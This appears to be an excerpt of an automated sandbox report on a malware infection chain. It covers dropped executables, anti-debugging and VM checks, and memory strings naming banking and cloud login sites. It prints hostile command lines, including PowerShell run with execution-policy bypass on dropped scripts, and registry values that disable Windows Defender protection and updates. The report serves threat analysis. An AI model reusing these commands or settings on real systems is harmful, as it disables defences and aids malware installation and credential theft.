Source: powershell.exe, 00000019.00000002.2918127173.0000000006FE0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASSOCIATORS OF {\\.\ROOT\Microsoft\Windows\Storage:MSFT_Partition.ObjectId="{1}\\\\user-PC\\root/Microsoft/Windows/Storage/Providers_v2\\WSP_Partition.ObjectId=\"{a33c734b-61ca-11ee-8c18-806e6f6e6963}:PR:{00000000-0000-0000-0000-500700000000}\\\\?\\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\""} WHERE AssocClass = MSFT_DiskToPartition ResultClass = MSFT_Disk ResultRole = Disk Role = Partitionion has failed the
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: powershell.exe, 00000019.00000002.2933297668.000000000830F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: {1}\\user-PC\root/Microsoft/Windows/Storage/Providers_v2\WSP_Partition.ObjectId="{a33c734b-61ca-11ee-8c18-806e6f6e6963}:PR:{00000000-0000-0000-0000-500700000000}\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}"
Source: file.exe, 00000000.00000002.2411288115.0000000000764000.00000040.00000001.01000000.00000003.sdmp, DocumentsECAFHIIJJE.exe, 00000014.00000002.2465829804.0000000000916000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000015.00000002.2488317379.00000000011D6000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000017.00000002.3291976640.00000000011D6000.00000040.00000001.01000000.0000000E.sdmp, file1.exe, 00000018.00000002.2876972921.00000000009CE000.00000040.00000001.01000000.0000000F.sdmp, 4136f86ac7.exe, 0000001E.00000002.3116078239.0000000000DF3000.00000040.00000001.01000000.00000012.sdmp, 4136f86ac7.exe, 0000001E.00000002.3129252471.0000000006044000.00000040.00000800.00020000.00000000.sdmp, 3160604f40.exe, 0000001F.00000002.2927433701.0000000000424000.00000040.00000001.01000000.00000013.sdmp, 0ac2a0f3ae.exe, 00000024.00000002.3120888781.0000000000B9D000.00000040.00000001.01000000.00000019.sdmp, 4136f86ac7.exe, 00000025.00000002.3258230937.0000000000DF3000.00000040.00000001.01000000.00000012.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.000000000149B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 19 { $_type += "VMware ESXi" }
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process queried: DebugPort
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Code function: 20_2_04C00C4B rdtsc 20_2_04C00C4B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C685FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6C685FF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C68C410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C68C410
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Code function: 20_2_0075652B mov eax, dword ptr fs:[00000030h] 20_2_0075652B
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Code function: 20_2_0075A302 mov eax, dword ptr fs:[00000030h] 20_2_0075A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 21_2_0101A302 mov eax, dword ptr fs:[00000030h] 21_2_0101A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 21_2_0101652B mov eax, dword ptr fs:[00000030h] 21_2_0101652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_0101A302 mov eax, dword ptr fs:[00000030h] 23_2_0101A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_0101652B mov eax, dword ptr fs:[00000030h] 23_2_0101652B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C65B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C65B66C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C65B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C65B1F7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C80AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C80AC62
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: amsi64_8996.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: file.exe PID: 3724, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 8712, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 4136f86ac7.exe PID: 8836, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3160604f40.exe PID: 5264, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 4136f86ac7.exe PID: 9108, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY3.ps1, type: DROPPED
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY2.ps1 "
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsECAFHIIJJE.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\DocumentsECAFHIIJJE.exe "C:\Users\user\DocumentsECAFHIIJJE.exe"
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe "C:\Users\user\AppData\Local\Temp\1005627001\file1.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1005628041\k4pDgO.ps1"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe "C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe "C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe "C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY2.ps1 "
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C854760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free, 0_2_6C854760
Source: file.exe, file.exe, 00000000.00000002.2411288115.0000000000764000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: ^b|Program Manager
Source: powershell.exe, 00000022.00000002.3292099813.000000E6B82CA000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: Program Manager Chrome
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C65B341 cpuid 0_2_6C65B341
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1005628041\k4pDgO.ps1 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1005637001\l.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.IO.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Net\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Net.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Roaming\Adobe\vMcvSUhjRwUjZHoUBOuO.txt VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6235A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6C6235A0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_00FE65E0 LookupAccountNameA, 23_2_00FE65E0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_01022517 GetTimeZoneInformation, 23_2_01022517
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Registry value created: TamperProtection 0
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations
Source: file1.exe, 00000018.00000002.2883393880.0000000001351000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2823411403.0000000001351000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3109019791.0000000005CD0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
